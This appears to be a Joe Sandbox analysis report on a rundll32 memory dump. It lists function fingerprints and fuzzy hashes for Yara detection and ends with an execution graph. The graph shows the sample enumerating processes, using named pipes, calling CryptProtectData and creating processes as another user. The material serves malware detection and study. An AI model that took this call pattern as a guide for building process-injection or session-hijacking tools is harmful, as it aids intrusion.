                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_3_4680000_rundll32.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 1834487df577c505560cddef124280e2db6d1d145cf34ae8b8746ee99e823488
                                                                                                                                                                      • Instruction ID: 2d5eed4b3772fab25d9d85193af7b2b453a6e5a5152056fefd5a449c54d00a17
                                                                                                                                                                      • Opcode Fuzzy Hash: 1834487df577c505560cddef124280e2db6d1d145cf34ae8b8746ee99e823488
                                                                                                                                                                      • Instruction Fuzzy Hash: 7301A1307042048BDB18AB69C4187AFBBE6AFC9704F24856DD406AB390EE755D068B94
                                                                                                                                                                      Function 04681968 Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000003.1742358914.0000000004680000.00000040.00000800.00020000.00000000.sdmp, Offset: 04680000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_3_4680000_rundll32.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 5ab7a353505d827f07f65768f5975e25bc90df3cfd901da176d1fb810b938688
                                                                                                                                                                      • Instruction ID: 6eec7a6c798ba5044afbd8fcfbd855abd5f2a927e947273d6f1749e232c771fd
                                                                                                                                                                      • Opcode Fuzzy Hash: 5ab7a353505d827f07f65768f5975e25bc90df3cfd901da176d1fb810b938688
                                                                                                                                                                      • Instruction Fuzzy Hash: EE1154356006099FCB04DFA4D858AB97BBAEF8C710F154019E50AE7360DF759885DB90
                                                                                                                                                                      Function 0468182A Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000003.1742358914.0000000004680000.00000040.00000800.00020000.00000000.sdmp, Offset: 04680000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_3_4680000_rundll32.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 1d4442a1985a83ce5cabafd863d7c742ecf8791855a581d86e4fe5387f292546
                                                                                                                                                                      • Instruction ID: 2bef9e2baad912755717ee95377d06e167acff557d6529f66a97537a41a3b3b2
                                                                                                                                                                      • Opcode Fuzzy Hash: 1d4442a1985a83ce5cabafd863d7c742ecf8791855a581d86e4fe5387f292546
                                                                                                                                                                      • Instruction Fuzzy Hash: 3C01F270A00109ABE718BA6885563FFBBB6ABC9704F11462ED102B3380DE756C06CBD1
                                                                                                                                                                      Function 00DAD01D Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.1743252585.0000000000DAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DAD000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_dad000_rundll32.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: a1811225e6c9fbf363a65030f63fcb850ceae0c5297f2ea7898175a65d226bb5
                                                                                                                                                                      • Instruction ID: e5ce92a2bf6c38772b76ac356d34369b1af5a6a0595c2fd206ac5ec44ceb3f47
                                                                                                                                                                      • Opcode Fuzzy Hash: a1811225e6c9fbf363a65030f63fcb850ceae0c5297f2ea7898175a65d226bb5
                                                                                                                                                                      • Instruction Fuzzy Hash: 1A012B710083409EE7108B25CD84767BFD9EF52324F1CC52AEC4A0F546C379D841C6B5
                                                                                                                                                                      Function 00DAD005 Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.1743252585.0000000000DAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DAD000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_dad000_rundll32.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 1bf28b493b9a1f850206f5031f90f0e707fc4b54725d40079b4a44f46edd3d6a
                                                                                                                                                                      • Instruction ID: 67ed7649a328c82355d6eb9c152ead643c8ba22d6286303c87877d7ac43824ef
                                                                                                                                                                      • Opcode Fuzzy Hash: 1bf28b493b9a1f850206f5031f90f0e707fc4b54725d40079b4a44f46edd3d6a
                                                                                                                                                                      • Instruction Fuzzy Hash: D3014C6100E3C09ED7128B358898B56BFB4EF53224F1DC1DBD8898F1A7C2699849C772
                                                                                                                                                                      Function 04686A30 Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000003.1742358914.0000000004680000.00000040.00000800.00020000.00000000.sdmp, Offset: 04680000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_3_4680000_rundll32.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 8f38f53c800f16a5ac5ea78a63ef6128c90c14f6c1eb7a041d210f8c50dc5426
                                                                                                                                                                      • Instruction ID: 0f9e49868cd7cc279c5b5a2576b16adaecd6c51df34843269e7c16ebba8d9881
                                                                                                                                                                      • Opcode Fuzzy Hash: 8f38f53c800f16a5ac5ea78a63ef6128c90c14f6c1eb7a041d210f8c50dc5426
                                                                                                                                                                      • Instruction Fuzzy Hash: 53018F3170020887DB18BB6AC4587AF7BE69FC8704F20856DE106B7390EEB56D058BD5
                                                                                                                                                                      Function 04681440 Relevance: .0, Instructions: 42COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000003.1742358914.0000000004680000.00000040.00000800.00020000.00000000.sdmp, Offset: 04680000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_3_4680000_rundll32.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: fef407d5b30b5d38a9368a257140682dc0c570ad375886d2af7a36cf1b3d3aa6
                                                                                                                                                                      • Instruction ID: 1900afaddaaddb59336ac0309a06d31aa9c4d66f9f41b9b3ac4b1a2e4d096b93
                                                                                                                                                                      • Opcode Fuzzy Hash: fef407d5b30b5d38a9368a257140682dc0c570ad375886d2af7a36cf1b3d3aa6
                                                                                                                                                                      • Instruction Fuzzy Hash: 9E016770A0974A5FC709AF7499351257FA9AEC6B0430509EEC646CF172F924D44AC7D2
                                                                                                                                                                      Function 04687FD3 Relevance: .0, Instructions: 41COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000003.1742358914.0000000004680000.00000040.00000800.00020000.00000000.sdmp, Offset: 04680000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_3_4680000_rundll32.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: d66dec4eacaf6054566a2b809e5476ea6c9f9ad44b63a90ae71cdce06615fa54
                                                                                                                                                                      • Instruction ID: 170e48c59bf5fe60edf792488d7fb8c5beccd0118b54c2f69117389598556606
                                                                                                                                                                      • Opcode Fuzzy Hash: d66dec4eacaf6054566a2b809e5476ea6c9f9ad44b63a90ae71cdce06615fa54
                                                                                                                                                                      • Instruction Fuzzy Hash: A4F028317043400FC311AA2DAC9189ABF9EEFC5265354822EF519DF3A1EEA1AC0547A0
                                                                                                                                                                      Function 04681431 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000003.1742358914.0000000004680000.00000040.00000800.00020000.00000000.sdmp, Offset: 04680000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_3_4680000_rundll32.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: e3a80084d59418d9fef5384f0f76343713fd3d42efa91d93bd94d66fb9ce3eff
                                                                                                                                                                      • Instruction ID: 8e734878116f1c95cffaba3ae18821e050d62a3c7d54b81fbccda6d55e10ef58
                                                                                                                                                                      • Opcode Fuzzy Hash: e3a80084d59418d9fef5384f0f76343713fd3d42efa91d93bd94d66fb9ce3eff
                                                                                                                                                                      • Instruction Fuzzy Hash: 50F0AF71A0430A0ECB08AFB499252267FAEEEC2B0430508BE820A8F261F920D446D7C2
                                                                                                                                                                      Function 04687FE0 Relevance: .0, Instructions: 34COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000003.1742358914.0000000004680000.00000040.00000800.00020000.00000000.sdmp, Offset: 04680000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_3_4680000_rundll32.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: b0927d17572214392a8304604e5affbfca42e094da0bc5918aef2834616a79e1
                                                                                                                                                                      • Instruction ID: 7e2866a031fa1253b9503bbdcd2cc405f60682f99a26862d580ed04f4b0e955d
                                                                                                                                                                      • Opcode Fuzzy Hash: b0927d17572214392a8304604e5affbfca42e094da0bc5918aef2834616a79e1
                                                                                                                                                                      • Instruction Fuzzy Hash: E0F082317403104B9715AA6EE88185BBB9EEBC8669380C13AF509DB360EFA1FC0547E0
                                                                                                                                                                      Function 04685278 Relevance: .0, Instructions: 33COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000003.1742358914.0000000004680000.00000040.00000800.00020000.00000000.sdmp, Offset: 04680000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_3_4680000_rundll32.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: f2396cf3c2759e67edc9b5d79a5e3e40eca240205322ea0f237a9746d15f9536
                                                                                                                                                                      • Instruction ID: 7f58e1be12c5ee7ffbe127983b8560d484cb5265aef7023038e2771cddf5f571
                                                                                                                                                                      • Opcode Fuzzy Hash: f2396cf3c2759e67edc9b5d79a5e3e40eca240205322ea0f237a9746d15f9536
                                                                                                                                                                      • Instruction Fuzzy Hash: 5CF027313053442BC315562AD81068ABBAADBCA714F14407AE608C7353CD715C038660
                                                                                                                                                                      Function 046828D4 Relevance: .0, Instructions: 29COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000003.1742358914.0000000004680000.00000040.00000800.00020000.00000000.sdmp, Offset: 04680000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_3_4680000_rundll32.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 4af5435476c1e7395bfb48645884e1c0daf2f292bf872acbfcd9c8b2ef55e288
                                                                                                                                                                      • Instruction ID: 4644e7f1fb454942d31fc4c1c432b93177bb8200059d36658949facd721bf406
                                                                                                                                                                      • Opcode Fuzzy Hash: 4af5435476c1e7395bfb48645884e1c0daf2f292bf872acbfcd9c8b2ef55e288
                                                                                                                                                                      • Instruction Fuzzy Hash: 67E0927079061802EF3835689A603765BCD4B62708F0006FEE506C2B93F9C4F845A396
                                                                                                                                                                      Function 0468773B Relevance: .0, Instructions: 27COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000003.1742358914.0000000004680000.00000040.00000800.00020000.00000000.sdmp, Offset: 04680000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_3_4680000_rundll32.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: cb9e0f619247216afd6a4358ede91202e0dc5ec2ef65763cc5fbb8cc613c7629
                                                                                                                                                                      • Instruction ID: a9fd3fc42f476649dfabaee4a2c9fe4c4598213a352218607fe09249d763926a
                                                                                                                                                                      • Opcode Fuzzy Hash: cb9e0f619247216afd6a4358ede91202e0dc5ec2ef65763cc5fbb8cc613c7629
                                                                                                                                                                      • Instruction Fuzzy Hash: 4AE06D7220C3408FD768DE28A840696BBD5DFA4201B14C83EE4D9C3384E971A841C729
                                                                                                                                                                      Function 04685288 Relevance: .0, Instructions: 25COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000003.1742358914.0000000004680000.00000040.00000800.00020000.00000000.sdmp, Offset: 04680000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_3_4680000_rundll32.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: e4576ab829bf808578d5c42cb225d38dd1305faba27393de7d7a900cb7229dfd
                                                                                                                                                                      • Instruction ID: d08c30f89958f53f099b03c5014d92b3566c7ec8c8c03bb3422fa8df9a26c7aa
                                                                                                                                                                      • Opcode Fuzzy Hash: e4576ab829bf808578d5c42cb225d38dd1305faba27393de7d7a900cb7229dfd
                                                                                                                                                                      • Instruction Fuzzy Hash: D1E086327142045BC3149A2AE851957F79FDBCD724B108479F50CD7356CDB29C428AA0
                                                                                                                                                                      Function 04687F67 Relevance: .0, Instructions: 24COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000003.1742358914.0000000004680000.00000040.00000800.00020000.00000000.sdmp, Offset: 04680000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_3_4680000_rundll32.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 13d3aa9b81ad52b5701580a76c50bb7ade2ef28ad9202426aa8f1978068750c9
                                                                                                                                                                      • Instruction ID: 989cc5455e1918a8b9917c9ca072300cfad77c6fc71090bc298735233af437e0
                                                                                                                                                                      • Opcode Fuzzy Hash: 13d3aa9b81ad52b5701580a76c50bb7ade2ef28ad9202426aa8f1978068750c9
                                                                                                                                                                      • Instruction Fuzzy Hash: 0FE09B70D05388AFC741DB68ED0505C7FB9DA02206B148599D408D7353FE70AE0487D1
                                                                                                                                                                      Function 04682F80 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000003.1742358914.0000000004680000.00000040.00000800.00020000.00000000.sdmp, Offset: 04680000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_3_4680000_rundll32.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 47a3426ce8927510416a53462a9407cc7e1435b7d20ac080dfeba620b8159fbd
                                                                                                                                                                      • Instruction ID: 43064e15659e186dac922e090a94926d29a5f1351282d6475bb784796c31f879
                                                                                                                                                                      • Opcode Fuzzy Hash: 47a3426ce8927510416a53462a9407cc7e1435b7d20ac080dfeba620b8159fbd
                                                                                                                                                                      • Instruction Fuzzy Hash: 8ED02E77E802285BCF013AA024112B6739CCF96028F0189EFEE05CB207B9706802C2C4
                                                                                                                                                                      Function 046817F0 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000003.1742358914.0000000004680000.00000040.00000800.00020000.00000000.sdmp, Offset: 04680000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_3_4680000_rundll32.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 146c587b18f768904d89a5854ce27bc671e0b38b8dbc0ac0ae31964f0044f730
                                                                                                                                                                      • Instruction ID: f8bf9d930e2ac1740f7f7d51cb8bd6c61ebec19e16cd6f34ed12cd322c420942
                                                                                                                                                                      • Opcode Fuzzy Hash: 146c587b18f768904d89a5854ce27bc671e0b38b8dbc0ac0ae31964f0044f730
                                                                                                                                                                      • Instruction Fuzzy Hash: 27D02B722182546FC309E750E4474657FB8FF5B21130580AFE801CB262DD311C46C7C4
                                                                                                                                                                      Function 04682958 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000003.1742358914.0000000004680000.00000040.00000800.00020000.00000000.sdmp, Offset: 04680000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_3_4680000_rundll32.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 4c00afc135752cc09d0bfa136260cde305a1c9aec2ed68b2cdca8e76fc885202
                                                                                                                                                                      • Instruction ID: 94475e1182bf6f4bcdb4387a9b2a0c73f7b1a50a03e1f40072b129c60087b693
                                                                                                                                                                      • Opcode Fuzzy Hash: 4c00afc135752cc09d0bfa136260cde305a1c9aec2ed68b2cdca8e76fc885202
                                                                                                                                                                      • Instruction Fuzzy Hash: 8FE04FB1E09288EFCB01DFA4EE5155CBFB1DB06204B0040E9E808DB253FA315F059792
                                                                                                                                                                      Function 046876C0 Relevance: .0, Instructions: 18COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000003.1742358914.0000000004680000.00000040.00000800.00020000.00000000.sdmp, Offset: 04680000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_3_4680000_rundll32.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: db9975b04111447421ff57009e1a67ae377c78bfc79b78589170f2321b64c70d
                                                                                                                                                                      • Instruction ID: 08fc9a2826913850022c72df2e6394420ac0c8140dcbdf4c75674e1cfd0ce4ec
                                                                                                                                                                      • Opcode Fuzzy Hash: db9975b04111447421ff57009e1a67ae377c78bfc79b78589170f2321b64c70d
                                                                                                                                                                      • Instruction Fuzzy Hash: B1D05E617192500F8B69A92C6C54490AF918FEB32532A81EFD505C7362E552AC83D394
                                                                                                                                                                      Function 04680C0C Relevance: .0, Instructions: 17COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000003.1742358914.0000000004680000.00000040.00000800.00020000.00000000.sdmp, Offset: 04680000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_3_4680000_rundll32.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 309c9d6ce73c7f6ff60437b6a6c99507e5054b81c4d97cecd56bbf779539e92d
                                                                                                                                                                      • Instruction ID: d00f10a29a9d56c1d79234943e6a358f91877e75caa02c1d0b35c94af54726fb
                                                                                                                                                                      • Opcode Fuzzy Hash: 309c9d6ce73c7f6ff60437b6a6c99507e5054b81c4d97cecd56bbf779539e92d
                                                                                                                                                                      • Instruction Fuzzy Hash: AED0A73231111C6B47047658D88687ABB99EB99360311843BFA0283224ED706C459399
                                                                                                                                                                      Function 04687F78 Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000003.1742358914.0000000004680000.00000040.00000800.00020000.00000000.sdmp, Offset: 04680000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_3_4680000_rundll32.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: c0fc7251fe9e3b79487e12f08b2620fe4126501fa0e64574d053745ad8b3a6cc
                                                                                                                                                                      • Instruction ID: 0d16c2b497b3476994ee9b1bd4322c01b9d26217f268d811a8fc4a0f67ef9b74
                                                                                                                                                                      • Opcode Fuzzy Hash: c0fc7251fe9e3b79487e12f08b2620fe4126501fa0e64574d053745ad8b3a6cc
                                                                                                                                                                      • Instruction Fuzzy Hash: 57D01230901208EF8B44DFACD90155DB7B9DB45205B5081A8A408E7310EF716F049790
                                                                                                                                                                      Function 04682968 Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000003.1742358914.0000000004680000.00000040.00000800.00020000.00000000.sdmp, Offset: 04680000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_3_4680000_rundll32.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: c64e8064a716cb7fe59f15c595af62a0efe71c467a17812d959eb8b750ddaa33
                                                                                                                                                                      • Instruction ID: fef8772aa8f8e0d3cc2909a60e279e08dfd8cf70ff3a7be292994268298f1ba6
                                                                                                                                                                      • Opcode Fuzzy Hash: c64e8064a716cb7fe59f15c595af62a0efe71c467a17812d959eb8b750ddaa33
                                                                                                                                                                      • Instruction Fuzzy Hash: EED05E70A0120CEFCB40DFA8EA0255DBBF9EB45204B5085A9E808E7342EA31AF049B90
                                                                                                                                                                      Function 04680440 Relevance: .0, Instructions: 11COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000003.1742358914.0000000004680000.00000040.00000800.00020000.00000000.sdmp, Offset: 04680000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_3_4680000_rundll32.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: ffe43c3daff476832c4c5f1da8b819869155531255ff31b3958730f855f2e112
                                                                                                                                                                      • Instruction ID: fd84801435aaed9feea012e34c8ed7b66a56887f37372404e7e072b836f48715
                                                                                                                                                                      • Opcode Fuzzy Hash: ffe43c3daff476832c4c5f1da8b819869155531255ff31b3958730f855f2e112
                                                                                                                                                                      • Instruction Fuzzy Hash: 3AC08CB142A380AFC7024B508D468A2BF34FFA370238183EBE081C6073D3361822DB36

                                                                                                                                                                      Execution Graph

                                                                                                                                                                      Execution Coverage:12.2%
                                                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                      Signature Coverage:6.9%
                                                                                                                                                                      Total number of Nodes:131
                                                                                                                                                                      Total number of Limit Nodes:13
                                                                                                                                                                      execution_graph 41390 5220f33 41394 52210e8 41390->41394 41398 52210d9 41390->41398 41391 5220f4b 41395 522110b 41394->41395 41402 5221471 41395->41402 41399 52210e8 41398->41399 41401 5221471 2 API calls 41399->41401 41400 522116a 41401->41400 41406 52214e0 41402->41406 41409 52214d5 41402->41409 41407 5221534 ConnectNamedPipe 41406->41407 41408 5221570 41407->41408 41410 5221534 ConnectNamedPipe 41409->41410 41411 5221570 41410->41411 41411->41411 41416 3991738 41417 399177a 41416->41417 41418 3991780 CryptProtectData 41416->41418 41417->41418 41419 39917c3 41418->41419 41341 522f6a0 41343 522f6fe CreateFileA 41341->41343 41344 522f7d5 41343->41344 41412 5222930 41413 5222983 CreateProcessAsUserW 41412->41413 41415 5222a14 41413->41415 41420 5220040 41421 5220071 41420->41421 41422 52200c7 41421->41422 41426 5220c39 41421->41426 41432 5224d11 41422->41432 41423 5220a4e 41423->41423 41427 5220c6c 41426->41427 41429 5220cb4 41427->41429 41440 5215fd9 41427->41440 41448 5215fe8 41427->41448 41428 5220d44 41429->41422 41433 5224d3e 41432->41433 41435 5224d57 41433->41435 41491 5224e70 41433->41491 41495 5224e80 41433->41495 41434 5224d80 41438 5224e70 WaitNamedPipeW 41434->41438 41439 5224e80 WaitNamedPipeW 41434->41439 41435->41423 41438->41435 41439->41435 41441 5215fe8 41440->41441 41442 521600c 41441->41442 41456 5216157 41441->41456 41463 5216168 41441->41463 41443 5216015 41442->41443 41444 5216157 4 API calls 41442->41444 41445 5216168 4 API calls 41442->41445 41443->41428 41444->41442 41445->41442 41449 521601c 41448->41449 41450 521600c 41448->41450 41452 5216157 4 API calls 41449->41452 41453 5216168 4 API calls 41449->41453 41451 5216015 41450->41451 41454 5216157 4 API calls 41450->41454 41455 5216168 4 API calls 41450->41455 41451->41428 41452->41450 41453->41450 41454->41450 41455->41450 41457 521619d 41456->41457 41458 521618d 41456->41458 41470 52162e8 41457->41470 41477 52162d8 41457->41477 41460 5216196 41458->41460 41484 5215588 41458->41484 41460->41442 41464 521618d 41463->41464 41466 521619d 41463->41466 41465 5216196 41464->41465 41467 5215588 ProcessIdToSessionId 41464->41467 41465->41442 41468 52162e8 2 API calls 41466->41468 41469 52162d8 2 API calls 41466->41469 41467->41464 41468->41464 41469->41464 41473 5216312 41470->41473 41476 52162ff 41470->41476 41471 5216308 41471->41458 41472 521647a K32EnumProcesses 41475 52164b2 41472->41475 41473->41476 41487 5215594 41473->41487 41475->41458 41476->41471 41476->41472 41478 52162e8 41477->41478 41479 52162ff 41478->41479 41482 5215594 K32EnumProcesses 41478->41482 41480 5216308 41479->41480 41481 521647a K32EnumProcesses 41479->41481 41480->41458 41483 52164b2 41481->41483 41482->41478 41483->41458 41485 5216520 ProcessIdToSessionId 41484->41485 41486 5216593 41485->41486 41486->41458 41488 5216428 K32EnumProcesses 41487->41488 41490 52164b2 41488->41490 41490->41473 41494 5224e80 41491->41494 41493 5224ec4 41493->41434 41494->41493 41499 522387c 41494->41499 41496 5224e8d 41495->41496 41497 522387c WaitNamedPipeW 41496->41497 41498 5224ec4 41496->41498 41497->41496 41498->41434 41500 5224ee8 WaitNamedPipeW 41499->41500 41502 5224f64 41500->41502 41502->41494 41345 b31238 41346 b31249 41345->41346 41352 b30e61 41346->41352 41358 b30e69 41346->41358 41364 b30e24 41346->41364 41370 b30e65 41346->41370 41347 b31282 41354 b30e4e 41352->41354 41353 b30e9e 41354->41353 41376 b336b0 41354->41376 41380 b336a0 41354->41380 41355 b3133b 41355->41347 41360 b30e4e 41358->41360 41359 b30e9e 41360->41359 41362 b336b0 RtlGetVersion 41360->41362 41363 b336a0 RtlGetVersion 41360->41363 41361 b3133b 41361->41347 41362->41361 41363->41361 41365 b30e2d 41364->41365 41366 b30d65 41365->41366 41368 b336b0 RtlGetVersion 41365->41368 41369 b336a0 RtlGetVersion 41365->41369 41367 b3133b 41367->41347 41368->41367 41369->41367 41372 b30e4e 41370->41372 41371 b30e9e 41372->41371 41374 b336b0 RtlGetVersion 41372->41374 41375 b336a0 RtlGetVersion 41372->41375 41373 b3133b 41373->41347 41374->41373 41375->41373 41377 b336c6 41376->41377 41385 b34c62 41377->41385 41378 b336cc 41378->41355 41381 b333d9 41380->41381 41381->41355 41381->41380 41383 b3339d 41381->41383 41384 b34c62 RtlGetVersion 41381->41384 41382 b336cc 41382->41355 41384->41382 